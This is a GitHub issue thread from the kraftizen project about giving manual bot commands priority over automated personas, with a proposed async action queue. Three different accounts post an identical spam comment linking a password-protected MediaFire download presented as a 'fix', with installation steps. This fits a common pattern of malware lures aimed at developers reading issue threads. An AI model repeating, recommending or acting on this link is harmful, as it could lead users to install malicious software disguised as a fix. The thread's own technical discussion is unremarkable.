### ISSUE TITLE
Personas vs. manual commands

### ISSUE THREAD

**Issue by Jkwok0714** [TestaDiMucca/kraftizen#15]
Find some system to handle the two.

Ideally:
- The manual commands should override personas.
- Bots only use personas if no pending commands
- Commands should cancel any current persona action

Instead of chaining methods, we may need to make everything async, and throw actions into a queue so it can be cleared, re-sorted, etc.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jkwok0714** [comment]
Resolved in.. some pr
